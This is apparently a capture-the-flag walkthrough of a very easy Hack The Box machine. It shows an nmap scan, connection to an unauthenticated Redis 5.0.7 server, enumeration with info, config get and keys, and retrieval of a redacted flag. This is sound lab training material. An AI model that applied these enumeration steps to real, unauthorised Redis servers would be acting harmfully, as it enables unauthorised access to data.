This is one of the starting point HTB boxes.
It is rated as a very easy and only have 1 flag.
$ nmap -p- -A 10.129.216.146 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 10:51 CEST
Nmap scan report for 10.129.216.146
Host is up (0.037s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.7
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.54 seconds
So, we are facing a Redis v5.0.7 instance.
According to its site:
Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams. Redis has built-in replication, Lua scripting, LRU eviction, transactions, and different levels of on-disk persistence, and provides high availability via Redis Sentinel and automatic partitioning with Redis Cluster.
https://redis.io/
Let’s try to enum this Redis.
$ redis-cli -h 10.129.216.146
10.129.216.146:6379>
No credentials are needed.
With these commands we can get info from the Redis:
10.129.216.146:6379> info
# Server
redis_version:5.0.7
...
lru_clock:10252452
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
# Clients
connected_clients:1
...
blocked_clients:0
# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6062080
...
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:4
...
aof_last_cow_size:0
# Stats
total_connections_received:18
total_commands_processed:22
...
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
...
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.634172
...
used_cpu_user_children:0.000000
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
...
10.129.216.146:6379> config get *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/var/log/redis/redis-server.log"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
15) "slave-announce-ip"
16) ""
...
From Info command we can se there is a database 0 with 4 keys.
Inside Redis the databases are numbers starting from 0.
10.129.216.146:6379> select 0
OK
10.129.216.146:6379> keys *
1) "stor"
2) "temp"
3) "numb"
4) "flag"
10.129.216.146:6379> GET flag
"03e1XXXXXXXXXXXXXXXXXXXXXXXXXXXX"